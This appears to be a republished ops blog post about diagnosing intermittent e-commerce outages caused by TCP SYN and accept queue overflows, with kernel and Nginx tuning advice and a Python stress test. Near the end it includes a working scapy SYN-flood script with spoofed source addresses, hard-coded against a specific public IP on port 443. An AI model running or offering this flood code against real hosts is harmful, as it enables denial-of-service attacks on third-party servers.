Diagnosing and Fixing TCP SYN Queue Overflows that Crash E‑commerce Sites
This article walks through a real‑world incident where an e‑commerce site suffered intermittent outages due to TCP SYN and accept queue overflows, explains the underlying handshake mechanics, shows how kernel and Nginx parameters can be tuned, and provides Python scripts for testing and SYN‑flood simulation.
Problem description: the monitoring system reported intermittent inaccessibility of the e‑commerce homepage and other pages; security and traffic metrics looked normal, and a server reboot only temporarily resolved the issue.
Preliminary judgment: check device and network interface errors (using
cat /proc/net/devand
ifconfig), and observe socket overflow and dropped sockets (e.g.,
netstat -s | grep -i listen).
Observation: SYN socket overflow and dropped sockets increased sharply.
Check kernel sysctl parameters:
net.ipv4.tcp_syncookies,
net.ipv4.tcp_max_syn_backlog,
net.core.somaxconn.
Inspect SELinux and NetworkManager status; disable if necessary.
Verify timestamp and reuse settings, and whether kernel recycle is enabled.
Deep analysis: the TCP three‑way handshake fills the half‑connection (SYN) queue first; when the full‑connection (accept) queue is full, the kernel follows the
tcp_abort_on_overflowsetting. With the default value 0, the server discards the client’s ACK, keeping the connection incomplete.
# cat /proc/sys/net/ipv4/tcp_abort_on_overflow 0
Changing
tcp_abort_on_overflowto 1 makes the server send a reset packet when the accept queue is full, which surfaces as “connection reset by peer” in the web logs, confirming the root cause.
Kernel and Nginx tuning performed:
Linux kernel parameters: net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 16384 net.core.somaxconn = 16384
Nginx configuration: backlog=32768;
Python multithreaded stress test (no new issues found):
<code>import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
url='https://www.wuage.com/'
response=requests.get(url)
soup=BeautifulSoup(response.text,'html.parser')
with ThreadPoolExecutor(20) as ex:
for each_a_tag in soup.find_all('a'):
try:
ex.submit(requests.get, each_a_tag['href'])
except Exception as err:
print('return error msg:'+str(err))
</code>Understanding TCP handshake queues
The diagram shows two queues: the SYN (half‑connection) queue and the accept (full‑connection) queue. During the first handshake step, the server places the SYN in the half‑connection queue and replies with SYN+ACK. In the third step, if the accept queue is not full, the server moves the entry to the accept queue; otherwise it follows the
tcp_abort_on_overflowpolicy.
If the accept queue is full and
tcp_abort_on_overflowis 0, the server may resend SYN+ACK, and a client with a short timeout will likely fail.
SYN Flood (DoS) attack example
<code>from concurrent.futures import ThreadPoolExecutor
from scapy.all import *
def synFlood(tgt, dPort):
srcList = ['11.1.1.2','22.1.1.102','33.1.1.2','125.130.5.199']
for sPort in range(1024, 65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
packet = ipLayer/tcpLayer
send(packet)
tgt = '139.196.251.198'
print(tgt)
dPort = 443
with ThreadPoolExecutor(10000000) as ex:
try:
ex.submit(synFlood, tgt, dPort)
except Exception as err:
print('return error msg:' + str(err))
</code>The article emphasizes that TCP half‑connection and full‑connection queue issues are easy to overlook but critical, especially for short‑lived connections, and suggests building robust incident‑response mechanisms.
Efficient Ops
This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.